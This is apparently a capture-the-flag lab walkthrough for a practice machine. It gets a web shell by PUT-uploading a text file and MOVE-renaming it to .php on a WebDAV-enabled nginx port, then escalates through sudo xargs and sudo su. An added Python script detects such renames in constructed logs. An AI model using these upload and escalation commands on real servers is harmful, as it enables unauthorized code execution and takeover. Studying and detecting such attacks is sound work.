# Lab Practice
Download: Unit
NAT, IP: 192.168.1.131
# Penetration Process
# Initial Information Gathering
```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http    nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: 415 Unsupported Media Type
8080/tcp open  http    nginx 1.22.1
| http-methods:
|_  Potentially risky methods: PUT MOVE
|_http-title: 415 Unsupported Media Type
|_http-server-header: nginx/1.22.1
```
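Port 8080 allows PUT and MOVE?!

A first PUT returns 404, but since MOVE is also allowed, maybe it is just php that is rejected?

```
curl -X PUT --upload-file shell.txt http://192.168.1.131:8080/shell.txt
```

The upload works, so MOVE it next:

```
curl -X MOVE -H 'Destination: http://192.168.1.131:8080/shell.php' http://192.168.1.131:8080/shell.txt
```

Start a listener, request the file, and get a shell.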
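
From the defender's side, the PUT followed by MOVE sequence above leaves a clear trace if the `Destination` header is logged. The detector below is an added example, not part of the original writeup; it assumes a custom nginx `log_format` that records `$http_destination`, and the log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines, assuming this nginx log_format (not from the writeup):
#   '$remote_addr "$request" $status dest="$http_destination"'
SAMPLE_LOG = """\
192.168.1.50 "PUT /shell.php HTTP/1.1" 404 dest="-"
192.168.1.50 "PUT /shell.txt HTTP/1.1" 201 dest="-"
192.168.1.50 "MOVE /shell.txt HTTP/1.1" 201 dest="http://192.168.1.131:8080/shell.php"
192.168.1.77 "PUT /notes.txt HTTP/1.1" 201 dest="-"
192.168.1.77 "MOVE /notes.txt HTTP/1.1" 201 dest="http://192.168.1.131:8080/archive/notes.txt"
192.168.1.50 "GET /shell.php HTTP/1.1" 200 dest="-"
"""

LINE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) dest="(?P<dest>[^"]*)"$'
)
EXEC_EXT = (".php", ".phtml", ".phar")  # extensions the server may hand to PHP


def is_exec(url_or_path):
    """True when the path component ends in an executable extension."""
    return urlsplit(url_or_path).path.lower().endswith(EXEC_EXT)


def find_rename_to_executable(log_text):
    """Flag successful MOVEs that turn a non-executable name into an executable one."""
    uploaded = set()  # (client ip, path) pairs created by a successful PUT
    alerts = []
    for raw in log_text.splitlines():
        m = LINE.match(raw.strip())
        if not m or not m["status"].startswith("2"):
            continue  # unparsable line or failed request
        key = (m["ip"], m["path"])
        if m["method"] == "PUT":
            uploaded.add(key)
        elif m["method"] == "MOVE" and is_exec(m["dest"]) and not is_exec(m["path"]):
            alerts.append({
                "ip": m["ip"],
                "source": m["path"],
                "dest": urlsplit(m["dest"]).path,
                "uploaded_by_same_client": key in uploaded,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_rename_to_executable(SAMPLE_LOG):
        print(alert)
```

The benign rename of `notes.txt` is not flagged, because its destination keeps a non-executable extension.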
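# Privilege Escalation

```
sudo -l
```

The output shows permission to run xargs.

```
sudo -u jones xargs -a /dev/null bash
```

This gives a shell as jones.

```
sudo -l
```

The output shows permission to run su, so simply run sudo su.

This gives root.

# Summary
easy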